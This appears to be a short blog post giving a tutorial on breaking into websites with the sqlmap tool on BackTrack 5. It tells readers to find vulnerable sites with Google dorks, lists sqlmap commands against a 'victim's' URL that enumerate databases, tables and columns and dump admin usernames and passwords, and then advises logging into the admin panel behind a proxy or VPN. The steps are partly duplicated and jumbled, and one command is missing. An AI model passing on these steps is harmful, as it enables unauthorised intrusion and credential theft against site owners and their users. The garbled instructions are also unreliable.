Sqlmap
Is An Automated Pen Testing Tool. That Automates The Process Of
Detecting And Exploiting SQL Injection Flaws And Taking Over Of
Databases. It Comes With A Powerful Detection Engine, Many Niche
features For The Ultimate Pen Tester And A Broad Range Of Switchs
Lasting From Database Fingerprinting. Over Data Fetching From The
Database. This Tool Is Best For Beginners. Who Just Now Entered In
Security Field. It Is Easy To Use Tool. This Tool Makes SQL Injection
Easy As Compared To Manual SQL Injection.
Follow these simple steps to hack website using backtrack 5 sqlmap tool.
1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site). You can search for vulnerable sites using Dorks. Google it!
4. Now you will get the database name of the website
7. Now you will get the tables list which is stored in aj database.
Now we got the columns and we got username and password
Now just find the admin panel of the website and use proxy/vpn when you are trying to login in the website as a admin
Follow these simple steps to hack website using backtrack 5 sqlmap tool.
1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site). You can search for vulnerable sites using Dorks. Google it!
3. Now type this command in the terminal and hit enter.
4. Now you will get the database name of the website
Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim’slink/index.php?id=4 -D (database name) –tables
6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -D aj –tables
7. Now you will get the tables list which is stored in aj database.
8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin –columns
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
Now we got the username and the password of the website !python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin -U test –dump
Now just find the admin panel of the website and use proxy/vpn when you are trying to login in the website as a admin
No comments:
Post a Comment